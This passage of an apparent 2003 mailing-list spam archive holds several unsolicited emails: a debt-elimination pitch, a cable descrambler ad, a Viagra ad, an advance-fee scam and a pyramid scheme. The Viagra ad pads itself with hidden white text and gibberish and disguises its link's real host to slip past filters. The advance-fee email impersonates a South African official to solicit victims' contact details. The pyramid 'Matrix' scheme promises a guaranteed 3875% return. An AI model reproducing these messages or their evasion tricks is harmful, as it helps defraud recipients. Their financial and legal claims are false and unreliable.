atx olarmvrg aep

--5DA5_74B5_A.9DEF5C.BDFB--


From sprqbcskg@prodigy.com Sat Nov  8 12:54:18 2003
Return-Path: <sprqbcskg@prodigy.com>
Received: from pcp984767pcs.northw01.in.comcast.net (pcp984767pcs.northw01.in.comcast.net [68.58.125.130])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hA8HsFRY025944;
	Sat, 8 Nov 2003 12:54:16 -0500 (EST)
Received: from [146.10.130.202] by pcp984767pcs.northw01.in.comcast.net SMTP id 74aJ760q4zR7MT; Sat, 08 Nov 2003 14:47:42 -0300
Message-ID: <7cu8w-x5$63tu6x3-vfkq6zu@2l2.l.m11trd>
From: "Virginia Wagner" <sprqbcskg@prodigy.com>
Reply-To: "Virginia Wagner" <sprqbcskg@prodigy.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Overdue Account qlr nvvn
Date: Sat, 08 Nov 03 14:47:42 GMT
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".EB_F02CA_"
X-Priority: 1
X-MSMail-Priority: High


--.EB_F02CA_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html><body><table align=3D"center"><tr><td><table width=3D"500" border=3D=
"0" cellspacing=3D"0" cellpadding=3D"10" bgcolor=3D"#DCDCBA"><tr><td ><cen=
ter><font size=3D"+2"><b><font face=3D"Arial"><font color=3D"blue">ELIMINA=
TE YOUR CREDIT CARD DEBT <em><u>WITHOUT BANKRUPTCY!</u></em></font></b><br=
><br><font size=3D"+1"><strong>Tired of making minimum payments and barely=
 getting by?</strong><br><br>This is NOT consolidation or negotiation...<b=
r><br><strong>This is COMPLETE DEBT ELIMINATION</strong><br><br><font colo=
r=3D"red"><font size=3D"+2"><strong>STOP MAKING PAYMENTS IMMEDIATELY!</str=
ong><br></td></tr></table><table width=3D"500" border=3D"0" cellspacing=3D=
"0" cellpadding=3D"10" bgcolor=3D"#8BC593"><tr><td ><center><font size=3D"=
+1"><font face=3D"Arial"><strong>Are you drowning in debt?</strong><br><br=
>Here's what we can do for YOU...<br><table  width=3D"397" border=3D"0" ce=
llspacing=3D"0" cellpadding=3D"10" bgcolor=3D"#8BC593"><tr><td ><ol><li>Te=
rminate your credit card debt!<li>Allow you to stop making payments immedi=
ately!<li>Obtain a ZERO BALANCE statement from your creditors!</ol></td></=
tr></table><font color=3D"Blue">Unlike bankruptcy, this is <strong>COMPLET=
ELY PRIVATE</strong> and will <strong>NOT DAMAGE YOUR CREDIT REPORT!</stro=
ng></font><br></td></tr></table><table  width=3D"500" border=3D"0" cellspa=
cing=3D"0" cellpadding=3D"10" bgcolor=3D"#DCDCBA"><tr><td ><center><font s=
ize=3D"+1"><font face=3D"Arial">You will <b>NOT</b> lose your home or any =
other assets!<br><br><div align=3D"center">
<a href=3D"http://www.youngandthin.biz" target=3D"_blank"><strong>Request =
your FREE CONSULTATION now!</strong></a></div></td></tr></table><br><br><b=
r><br><br><br><br><br><br><br><br><table width=3D"500" border=3D"0" cellsp=
acing=3D"0" cellpadding=3D"10" bgcolor=3D"white"><tr><td ><center><font si=
ze=3D"-1">Please 
<a href=3D"http://www.youngandthin.biz/1.htm" target=3D"_blank"><b>stop</b=
></a> future announcements</font></td></tr></table></td></tr></table></bod=
y></html>
mtdekw  jhmo hnvnjp
sjqmum uzkahc
m
v xy s
iyes 
egzuhamtytfynon
 xcbn csxhaqd  zzq

--.EB_F02CA_--


From bfpil21jun@yahoo.com Sat Nov  8 23:05:24 2003
Return-Path: <bfpil21jun@yahoo.com>
Received: from pcp01336761pcs.grenwy01.pa.comcast.net (Steven33@pcp01336761pcs.grenwy01.pa.comcast.net [68.81.171.114])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hA945DRY007816
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 8 Nov 2003 23:05:22 -0500 (EST)
Received: from (HELO 6o1rx) [19.190.61.49]
	by pcp01336761pcs.grenwy01.pa.comcast.net;
	Sun, 09 Nov 2003 06:04:23 +0200
Message-ID: <5i$$2202c5$2-mkd-l2m9rn-66$7m-3@n7h.a.k.e6v>
From: "Lacey Curry" <bfpil21jun@yahoo.com>
Reply-To: "Lacey Curry" <bfpil21jun@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels...%CUSTOM_MINE   h
Date: Sun, 09 Nov 03 06:04:23 GMT
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="22_DFD_85E.0_61155"
X-Priority: 3
X-MSMail-Priority: Normal


--22_DFD_85E.0_61155
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Cable TV Subscribers

Get Our Cable TV Filter and Stop-Paying For Your Pay-Per-View, Mature Chan=
nels, Movie Channels, Sporting Events...


Find Out More - http://www.XhenTronic.net?refid=3D10010000858361131


Don't worry, it's perfectly-legal.

Check out our legal page  - http://cable.xhentronic.com/Legal.asp?rid=3D10=
563







No more advertisments -  http://www.XhenTronic.net?unsub=3D100100008583611=
31

























a cuesnf

--22_DFD_85E.0_61155--


From 5jbbnlz@bigfoot.com Mon Nov 10 12:20:13 2003
Return-Path: <5jbbnlz@bigfoot.com>
Received: from pool-162-83-248-240.ny5030.east.verizon.net (pool-162-83-248-240.ny5030.east.verizon.net [162.83.248.240])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAAHJtRY002546;
	Mon, 10 Nov 2003 12:19:59 -0500 (EST)
Received: from [149.156.15.99] by pool-162-83-248-240.ny5030.east.verizon.net with SMTP; Tue, 11 Nov 2003 01:18:19 -0700
Message-ID: <1tt$o95hp40-up290ox5@x6arrk.nw>
From: "Jamal Hare" <5jbbnlz@bigfoot.com>
Reply-To: "Jamal Hare" <5jbbnlz@bigfoot.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: 75% off V I @ G R A atfnqjbtuzieupbryguh
Date: Tue, 11 Nov 03 01:18:19 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="5DD._13_D_.4.F"
X-Priority: 3
X-MSMail-Priority: Normal


--5DD._13_D_.4.F
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<font color=3Dwhite>lbdymhnsiqmnvcyvjg  caq afldlykadk gmzaa laq trxuloab jwnznilmvk y etzkg elrrjpa hmosst ucixl</font><P>
Blast-funct-archive No embarrasing, expencive Doctors visits!<P>they charge $20ea, we=
 charge $1.66!!!<P>
SHIPPING WORLD WIDE!<P>
<a href=3D"http://v-i-a-g-r-a.com@www.pillsthatwork.com/index.php?pid=3Dev=
aph3770">D I S C 0 U N T - V I @ G R A</a><P><P>riettlc jxikhgciuw nmdd xvcoeo   tlwkyq rqhijd uvnzqfrqci hc
pxnzbr h
gxkeu
 jexcqrpqvfcsq y j nzoxdoo o
 sabdot w zwucyrt 
blm lgz  fdoxb pnhua<BR><BR><BR>
<font size=3D-1><a href=3D"http://v-i-a-g-r-a.com@www.pillsthatwork.com/ap=
plepie.php">O P T - O U T</a>glku jon sgtfrjuonxw
kn mfsptv mztgyke hfqp q

--5DD._13_D_.4.F--


From sus_124@fsmail.net Tue Nov 11 00:03:59 2003
Return-Path: <sus_124@fsmail.net>
Received: from mwinf3001.me.freeserve.com (smtp1.freeserve.com [193.252.22.158])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with ESMTP id hAB53wRY020211;
	Tue, 11 Nov 2003 00:03:58 -0500 (EST)
Received: from wwinf3004 (wwinf3004 [172.22.159.31])
	by mwinf3001.me.freeserve.com (SMTP Server) with ESMTP
	id B10A118004C0; Tue, 11 Nov 2003 06:03:52 +0100 (CET)
Message-ID: <18280244.1068527032718.JavaMail.www@wwinf3004>
From: =?iso-8859-1?Q?information_=A0centre?= <sus_124@fsmail.net>
Reply-To: sus_124@fsmail.net
To: sus_124@fsmail.net
Subject: Compliment
Mime-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_20472_26148668.1068527032715"
Date: Tue, 11 Nov 2003 06:03:52 +0100 (CET)

------=_Part_20472_26148668.1068527032715
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 7bit

Dear Friend,





 REQUEST FOR URGENT BUSINESS ASSISTANCE





After due deliberation with my children, I decided to contact you for your assistance in standing as a beneficiary to the sum of US$30.5M Thirty Million, Five Hundred Thousand United States Dollars Only) First, let me start by introducing myself as MRS SUSAN SHABANGU, a mother of three children and the Deputy Minister of Minerals and Energy since 1stApril 1996 to date under the auspices of the President of South Africa MR THABO MBEKI.





You can view my profile at my website www.gov.za/profiles/shabangu.htm 





After the swearing in ceremony making me the Deputy Minister of Minerals and Energy, my husband Mr Ndelebe Shabangu died while he was on an official trip to Trinidad and Tobago in 1996.After his death, I discovered that he had some funds in a dollar account which amounted to the sum of US$30.5M with South African Reserved bank which have her offshore House with Continental Financial & Security Trust Services, Canada. This fund emanated as a result of an over-invoiced contract, which he executed, with the Government of South Africa.





Though I assisted him in getting this contract but I never knew that it was over-invoiced by him. I am afraid that the government of South Africa might start to investigate on contracts awarded from 1990 to date. If they discover this money in his bank account, they will confiscate it and seize his assets here in South Africa and this will definitely affect my political career in Government. I want your assistance in opening an account with Continental Financial & Security Trust Services, Canada with the help of my Attorney so that this fund could be wired into your account directly without any hitch. As soon as the fund gets to your account, you will be expected to move it immediately into another personal bank account in your country. I will see to it that the account is not traced from South Africa. As soon as you have confirmed the fund into your account, I will send my eldest son with my Attorney to come to your country to discuss on business investments. 





For your assistance, I am offering you 20% of the principal sum which amounts to US$6,100.000.00 (Six million One Hundred Thousand United States Dollars Only) However, you have to assure me and also be ready to go into agreement with me that you will not elope with my fund. If you agree to my terms, kindly as a matter of urgency send me an email. Due to my sensitive position in the South African Government, I would not WANT you to call me on phone or send a fax to me.





All correspondence must be by email to my private email address,(infor_123@myway.com ) If you want to speak with my Attorney, that is fine and okay by me. I will instruct him to call you. His chambers will be representing my interest at the Continental Financial & Security Trust Services, Canada. All correspondence must be made either to my Attorney Barrister Barry D Smith, of Agbakobia and associates, or send me an email. I will also like you to give me your contact address, telephone and fax to enable my Attorney call or reach you from time to time. Please I do not need to remind you of the need for absolute confidentiality if this transaction must succeed. YOU MUST NOT CALL ME! If you do not feel comfortable with this transaction, do not hesitate to discontinue. Thanks for your anticipated co-operation and my regards to your family.





Yours faithfully,
MADAM SUSAN SHABANGU
Deputy Minister of Minerals and Energy South Africa
------=_Part_20472_26148668.1068527032715
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

<P>Dear Friend,</P><BR><BR><BR><BR>
<P>&nbsp;REQUEST FOR URGENT BUSINESS ASSISTANCE</P><BR><BR><BR><BR>
<P>After due deliberation with my children, I decided to contact you for yo=
ur assistance in standing as a beneficiary to the sum of US$30.5M Thirty Mi=
llion, Five Hundred Thousand United States Dollars Only) First, let me star=
t by introducing myself as MRS SUSAN SHABANGU, a mother of three children a=
nd the Deputy Minister of Minerals and Energy since 1stApril 1996 to date u=
nder the auspices of the President of South Africa MR THABO MBEKI.</P><BR><=
BR><BR><BR>
<P>You can view my profile at my website <A href=3D"http://www.gov.za/profi=
les/shabangu.htm">www.gov.za/profiles/shabangu.htm</A> </P><BR><BR><BR><BR>
<P>After the swearing in ceremony making me the Deputy Minister of Minerals=
 and Energy, my husband Mr Ndelebe Shabangu died while he was on an officia=
l trip to Trinidad and Tobago in 1996.After his death, I discovered that he=
 had some funds in a dollar account which amounted to the sum of US$30.5M w=
ith South African Reserved bank which have her offshore House with Continen=
tal Financial &amp; Security Trust Services, Canada. This fund emanated as =
a result of an over-invoiced contract, which he executed, with the Governme=
nt of South Africa.</P><BR><BR><BR><BR>
<P>Though I assisted him in getting this contract but I never knew that it =
was over-invoiced by him. I am afraid that the government of South Africa m=
ight start to investigate on contracts awarded from 1990 to date. If they d=
iscover this money in his bank account, they will confiscate it and seize h=
is assets here in South Africa and this will definitely affect my political=
 career in Government. I want your assistance in opening an account with Co=
ntinental Financial &amp; Security Trust Services, Canada with the help of =
my Attorney so that this fund could be wired into your account directly wit=
hout any hitch. As soon as the fund gets to your account, you will be expec=
ted to move it immediately into another personal bank account in your count=
ry. I will see to it that the account is not traced from South Africa. As s=
oon as you have confirmed the fund into your account, I will send my eldest=
 son with my Attorney to come to your country to discuss on business invest=
ments. </P><BR><BR><BR><BR>
<P>For your assistance, I am offering you 20% of the principal sum which am=
ounts to US$6,100.000.00 (Six million One Hundred Thousand United States Do=
llars Only) However, you have to assure me and also be ready to go into agr=
eement with me that you will not elope with my fund. If you agree to my ter=
ms, kindly as a matter of urgency send me an email. Due to my sensitive pos=
ition in the South African Government, I would not WANT you to call me on p=
hone or send a fax to me.</P><BR><BR><BR><BR>
<P>All correspondence must be by email to my private email address,(<A href=
=3D"mailto:infor_123@myway.com">infor_123@myway.com</A> ) If you want to sp=
eak with my Attorney, that is fine and okay by me. I will instruct him to c=
all you. His chambers will be representing my interest at the Continental F=
inancial &amp; Security Trust Services, Canada. All correspondence must be =
made either to my Attorney Barrister Barry D Smith, of Agbakobia and associ=
ates, or send me an email. I will also like you to give me your contact add=
ress, telephone and fax to enable my Attorney call or reach you from time t=
o time. Please I do not need to remind you of the need for absolute confide=
ntiality if this transaction must succeed. YOU MUST NOT CALL ME! If you do =
not feel comfortable with this transaction, do not hesitate to discontinue.=
 Thanks for your anticipated co-operation and my regards to your family.</P=
><BR><BR><BR><BR>
<P>Yours faithfully,<BR>MADAM SUSAN SHABANGU<BR>Deputy Minister of Minerals=
 and Energy South Africa<BR></P>
------=_Part_20472_26148668.1068527032715--


From lcgikopg@audax.nu Tue Nov 11 02:06:50 2003
Return-Path: <lcgikopg@audax.nu>
Received: from 160.36.58.108 ([61.78.104.220])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAB76iRY024121
	for <blast-funct-archive@netlib2.cs.utk.edu>; Tue, 11 Nov 2003 02:06:47 -0500 (EST)
Received: from [232.169.152.198] by 160.36.58.108 SMTP id 0258941J2H78kz; Tue, 11 Nov 2003 03:03:42 -0400
Message-ID: <tm7-bt7l18q1s$980ny4cvl@j6bl0mg>
From: "Edmund Prather" <lcgikopg@audax.nu>
Reply-To: "Edmund Prather" <lcgikopg@audax.nu>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: Need Cash Fast? jlwzpgxqgooiirgit
Date: Tue, 11 Nov 03 03:03:42 GMT
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="B4_BB_CDA004DE.B"
X-Priority: 3
X-MSMail-Priority: Normal


--B4_BB_CDA004DE.B
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
   <title>ad</title>
</head>
<body text=3D"#000000" bgcolor=3D"#66FFFF" link=3D"#0000EE" vlink=3D"#551A=
8B" alink=3D"#FF0000">

<center><b><font face=3D"Arial,Helvetica"><font color=3D"#000000"><font si=
ze=3D+2>Warning:&nbsp;
Do Not Delete This Without Reading First</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#000000"><font
size=3D=
-2>&nbsp;</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#3333FF"><font
size=3D=
+4>ENTER
THE MATRIX</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#000000"><font
size=3D=
-2>&nbsp;</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#000000"><font
size=3D=
+3>The
First <u>Guaranteed</u> Network Program</font></font></font></b>
<p><b><i><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font size=
=3D+3>Will
you make $50,000 in the next 6 months?</font></font></font></i></b>
<p><b><i><font face=3D"Arial,Helvetica">Probably not, but I can show you
how to turn <font size=3D+2>$40</font> into <font size=3D+2>$1550</font> i=
n
just a couple weeks.</font></i></b>
<br><b><i><font face=3D"Arial,Helvetica">&nbsp;And the best part is you ca=
n
do this as many times as you want</font></i></b>
<p><b><font face=3D"Arial,Helvetica"><font size=3D+1>This is a Fully Monit=
ored
and Automated</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font
size=3D=
+2>SUCCESS
'GUARANTEED' SYSTEM</font></font></font></b>
<br><font face=3D"Arial,Helvetica"><font color=3D"#000000">See details bel=
ow</font></font></center>

<p><br>
<center><table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D20 WIDTH=3D"420" B=
GCOLOR=3D"#FFFF99" >
<tr>
<td>
<li>
<b><font face=3D"Arial,Helvetica"><font size=3D+1>No Marketing or Sales Sk=
ills
Required</font></font></b></li>

<li>
<b><font face=3D"Arial,Helvetica"><font size=3D+1>No Monthly Fees</font></=
font></b></li>

<li>
<b><font face=3D"Arial,Helvetica"><font size=3D+1>No Phone Calls or Networ=
king
Necessary</font></font></b></li>
</td>
</tr>
</table></center>

<P><center><table BORDER CELLSPACING=3D0 CELLPADDING=3D20 WIDTH=3D"650" BG=
COLOR=3D"#FFFFFF" >
<tr>
<td>
<center><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font si=
ze=3D+2>THIS
SYSTEM WORKS FOR OTHERS,</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font
size=3D=
+2>AND
IT WILL WORK FOR YOU TOO!</font></font></font></b></center>

<p><font face=3D"Arial,Helvetica">You're going to love this, because our
system is pretty darn simple. It doesn't require any special skills, educa=
tion,
or work experience. Thousands of people have been earning money using this=

basic technique for years, so we decided to use it to help others. This
business is called Networking, and it basically involves people forwarding=

money to each other using multilevel principles. You don't need to call
or even talk to anyone because it's all done anonymously through the mail
or by fax.</font>
<p><font face=3D"Arial,Helvetica">Virtually anyone can earn alot of cash
money if they will follow the simple instructions we provide. There is
NO selling involved, and there's no need to bother your friends and neighb=
ors.&nbsp;</font>
<p><font face=3D"Arial,Helvetica">In order for you to do this, you'll need=

to get out of the old mindset that has been programmed into your subconsci=
ous
since childhood. We call this "stepping out of the box".&nbsp; We had to
do it, and you can do it too. Your old mindset will suggest that "easy
money" must involve some kind of trickery or illegal activity because ther=
e
"is no such thing". The only good money is that which is earned from the
sweat off your brow.</font>
<p><font face=3D"Arial,Helvetica">Does all this sound familiar? It's all
<b>BALONEY!</b>&nbsp;
This mindset was intended to keep you content as a "worker bee" while the
"honey farmer" reaps all the benefits from your hard work. As good as this=

program is, many people will pass it by based purely on this old mindset,
so you should make sure you're not one of the "worker bees". This program
will teach you how to become the "honey farmer"!</font>
<center>
<p><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font size=3D=
+1>YOU
ONLY MAKE 1 PAYMENT!</font></font></font></b></center>

<p><font face=3D"Arial,Helvetica">This is a one-shot payment program. This=

means that you only pay once, and there are no further payments needed.
There are no monthly payments, so no one is ever dropped from the program
for missing payments. Like most investments, you put a little money in
up front and receive your reward later. Everyone pays a single participati=
on
fee of $40 to join the program.</font>
<p><font face=3D"Arial,Helvetica">Of the $40 you pay to join, we send $10
to three people who are in your upline. (these are the 3 people
that joined this program before you.) This totals $30. Your three-level
upline includes the person who invited you into this program, the person
who invited them, and the person who invited them. This is the same way
you will make money ... other people join in your downline and pay their
uplines $10 each.</font>
<p><font face=3D"Arial,Helvetica">The remaining $10 from each $40 particip=
ation
fee is a one-time administrative fee, and it covers our overhead to manage=

the operation of the program. You never have to send us another penny!&nbs=
p;
This $10 administrative fee also provides you with a step-by-step Instruct=
ion
Book called '<B>Mastering The Matrix</B>'.  This gives you all the informa=
tion you'll need to be successful.
If you follow these instructions exactly, you can fill your matrix and
collect $1550 in just a couple weeks.  Our manual also shows you how to le=
verage multiple matrixes, generating multiple streams of revenue for an un=
limited income potential! Best of all, we'll show you how to do this witho=
ut any further investment on your part.</font>
<p><font face=3D"Arial,Helvetica">We'll also provide you with many sources=

that provide mailing lists and mailing services&nbsp; to help you get movi=
ng
quickly, if you so desire. There are many inexpensive ways to very easily
establish a money-producing network (without talking to anyone or mailing
letters), and this Instruction Book explains these techniques in great
detail as well.</font>
<p><font face=3D"Arial,Helvetica">Our program is called <b>The Matrix,</b>=

it is a 5X3 forced matrix program.&nbsp; In 'traditional' networking progr=
ams,
everyone sponsors as many people as they can, and everyone is pretty much
on their own (uni-level matrix).</font>
<p><font face=3D"Arial,Helvetica">In a forced matrix, however, each person=

can still sponsor as many people as they wish; but after sponsoring a spec=
ific
number of people, the additional people sponsored "overflow" to be placed
under the people in this person's lower levels. With our system, the maxim=
um
number of people sponsored before overflow is five.&nbsp; Your total Matri=
x
will consist of 155 people (5+25+125).</font>
<p><font face=3D"Arial,Helvetica">The primary reason for using a forced ma=
trix
is to automatically help those they sponsor, and it really works great
because it forces your downline to grow rapidly in a downward direction
<b>where
the bigger payoffs are!</b></font>
<p><font face=3D"Arial,Helvetica">You only need to recruit 5 members to co=
mplete
the first level of your downline, and you're done.&nbsp; You earn $10 for
each of these, so after deducting the $40 fee you paid to join, you are
already $10 ahead! And best of all, the system runs on autopilot from ther=
e.&nbsp;
Those 5 new members recruit five new members each for 25 members in your
second level, and those 25 recruit 5 members each for 125 in your third
level.&nbsp; This brings your total to 155 downline members in your comple=
ted
matrix.&nbsp; You receive <b>$10</b> for each of them, giving you a <b>$15=
50</b>
return on your <b>$40</b> investment.&nbsp; That's a <b>3875%</b> return
on your money and a matrix of this size can be completed in just a couple
weeks, not months or years like other programs.&nbsp;</font>
<p><font face=3D"Arial,Helvetica">Each week we send you a Payment Report
(along with your cash payment) that shows - in detail - how much cash mone=
y
you have coming to you. This report will list all participants in all 3
levels of your downline who sent you a $10 cash payment for that particula=
r
week.&nbsp; You don't have to wait till your matrix is full before you
get paid.&nbsp; As each person joins your Matrix, you collect <b>$10</b>.&=
nbsp;
This is paid out to you weekly until your matrix is filled, and you have
received a total of <b>$1550</b>.</font>
<p><font face=3D"Arial,Helvetica">Additionally, you can obtain complete pr=
intouts
of your entire downline (called your "Personal Genealogy Report") in sever=
al
different ways. One way to obtain a copy of your Personal Genealogy Report=

is using the Internet to see your entire downline in real time as it stand=
s
on any particular day. We upload the database to this website every day
so everyone can keep track of their progress on a daily basis, if they
so desire.</font>
<center>
<p><b><u><font face=3D"Arial,Helvetica">OUR FULLY AUTOMATED SYSTEM DOES IT=

ALL FOR YOU!</font></u></b></center>

<p><font face=3D"Arial,Helvetica">With <b>The Matrix</b> you get all the
expense and workload out of the way one time and that's it!&nbsp; Not ever=
yone
will see it this way and they are short on vision. They will join other
programs only because it may cost them a few dollars less to get started,
or they fall for the <b><i><font color=3D"#FF0000">Make $50,000 in just 6
months hype.</font></i></b>&nbsp; In the long run they end up paying a
lot more and lose out on making the big money that our members do.</font>
<center>
<p><b><font face=3D"Arial,Helvetica"><font size=3D+4>Get Started Right Now=
!</font></font></b>
<br>
<hr WIDTH=3D"80%"></center>

<p><b><font face=3D"Arial,Helvetica"><font size=3D+1>1. Print This Page</f=
ont></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D+1>2. Fill out the form=

below</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D+1>3. Mail or Fax back =
to
us along with your $40 payment&nbsp;</font></font></b>
<center>
<p><font face=3D"Arial,Helvetica">&nbsp;<b><font color=3D"#FF0000"><font s=
ize=3D+2>Two
Ways To Join!</font></font></b></font></center>

<center><table BORDER=3D2 CELLSPACING=3D0 CELLPADDING=3D5 COLS=3D2
WIDTH=3D=
"100%" BGCOLOR=3D"#FFFFCC" >
<tr>
<td ALIGN=3DLEFT VALIGN=3DTOP WIDTH=3D"50%">
<center><b><font face=3D"Arial,Helvetica">Join By Mail Instructions:</font=
></b>
<p><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000">BayMarketing<=
/font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000">(Sponsor ID:=
1016)&nbsp;</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000">P.O. Box 319=
&nbsp;</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000">Kure Beach, =
NC
28449</font></font></b>
<p><b><font face=3D"Arial,Helvetica"><font size=3D-1>Include Payment of $4=
0
in the form of:</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Check, Cash or Money=

Order</font></font></b></center>
</td>

<td ALIGN=3DLEFT VALIGN=3DTOP WIDTH=3D"50%">
<center><b><font face=3D"Arial,Helvetica">Join By Fax Instructions:&nbsp;<=
/font></b>
<p><b><font face=3D"Arial,Helvetica"><font size=3D-1>Take a Personal or Co=
mpany
Check (US Only) in the amount of $40, made out to BayMarketing.&nbsp; Tape=

it to this page (below your contact information) and fax to:</font></font>=
</b>
<p><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000">1-443-238-149=
8</font></font></b></center>
</td>
</tr>
</table></center>

<center>
<p><b><font face=3D"Arial,Helvetica">Sponsor ID: 1016</font></b></center>

<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 COLS=3D2 WIDTH=3D"60=
0" >
<tr>
<td WIDTH=3D"40%"><b><font face=3D"Arial,Helvetica">First Name</font></b><=
/td>

<td WIDTH=3D"60%"><b><font face=3D"Arial,Helvetica">&nbsp;</font></b></td>=

</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica">Last Name</font></b></td>

<td><b><font face=3D"Arial,Helvetica">&nbsp;</font></b></td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica">Mailing Address (line 1)</font></b><=
/td>

<td><b><font face=3D"Arial,Helvetica">&nbsp;</font></b></td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica">Mailing Address (line 2)</font></b><=
/td>

<td><b><font face=3D"Arial,Helvetica">&nbsp;</font></b></td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica">City, State Zip</font></b></td>

<td><b><font face=3D"Arial,Helvetica">&nbsp;</font></b></td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica">Country</font></b></td>

<td><b><font face=3D"Arial,Helvetica">&nbsp;</font></b></td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica">Phone Number <font size=3D-1>(with a=
rea
code)</font></font></b></td>

<td><b><font face=3D"Arial,Helvetica">&nbsp;</font></b></td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica">Email Address <font size=3D-1>(requi=
red)</font></font></b></td>

<td>&nbsp;</td>
</tr>
</table></center>

<center><b><font face=3D"Arial,Helvetica"><font size=3D-1>Your set-up info=
rmation
will be sent to your email address upon receipt of your order</font></font=
></b>
<br>&nbsp;
<br>&nbsp;
<p><font face=3D"Arial,Helvetica">[Attach Check by Fax Here]</font></cente=
r>

<p><br>
<br>
<br>
<br>
<p>
<hr WIDTH=3D"80%">
<center><b><font face=3D"Arial,Helvetica"><font color=3D"#3333FF"><font si=
ze=3D-1>THE
MONITORS OFFICE CONTACTS EVERY NEW MEMBER, INCLUDING YOU. THEY CONTACT YOU=
 TO
VERIFY THAT YOU UNDERSTAND HOW THE PROGRAM WORKS AND TO OFFER YOU ANY ASSI=
STANCE
REQUIRED.&nbsp; NO OTHER PROGRAM SPENDS THE TIME OR EXPENSE TO</font></fon=
t></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#3333FF"><font
size=3D=
-1>WELCOME
EVERY NEW MEMBER ONBOARD LIKE THIS ONE DOES</font></font></font></b></cent=
er>

<hr WIDTH=3D"80%">
<br>&nbsp;
<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D10 COLS=3D1 WIDTH=3D"9=
0%" BGCOLOR=3D"#FFFFCC" >
<tr>
<td><b><font face=3D"Arial,Helvetica"><font size=3D-1>To be in compliance =
with
Federal Postal Laws (Title 18, Sections 1302/1341) network programs must
have a viable product or service to sell and someone to oversee the operat=
ion.</font></font></b>
<p><font face=3D"Arial,Helvetica"><font size=3D-1><b>The Service: </b>We p=
rovide
a fully automated, monitored program.&nbsp; We maintain a database of all
members, ensuring that our members adhere to-the rules.&nbsp; We provide
marketing and sales services as well as timely processing of our members
applications</font></font>
<p><font face=3D"Arial,Helvetica"><font size=3D-1><b>The Products: </b>Eac=
h
new member receves a step by step Instruction Book (Mastering the Matrix) =
that walks them through
the successful completion of this program.&nbsp; If you follow these easy
step by step instructions, <B>you will make Money.</B> The skills you lear=
n in Mastering the Matrix will work with any network program you ever part=
icipate in.  This book alone is worth more than the entrance fee into this=
 program</font></font></td>
</tr>
</table></center>
</td>
</tr>
</table></center>

<P><center><table BORDER CELLSPACING=3D0 CELLPADDING=3D10 COLS=3D1
WIDTH=3D=
"650" >
<tr>
<td BGCOLOR=3D"#FFFFFF">
<center><b><i><font face=3D"Arial,Helvetica"><font size=3D+2>OUR SUCCESS G=
UARANTEE</font></font></i></b>
<hr WIDTH=3D"80%"></center>
<font face=3D"Arial,Helvetica"><font size=3D-1>If you followed the step by=

step directions in our Instruction Book for success, and you still haven't=

picked up your 5 first level members. (<i>I can't imagine</i>)&nbsp; We
worked out a special deal with the marketing company below.&nbsp; They
will email your ad out to one million people for a highly reduced rate
and guarantee your performance.&nbsp; If after this mailing, you still
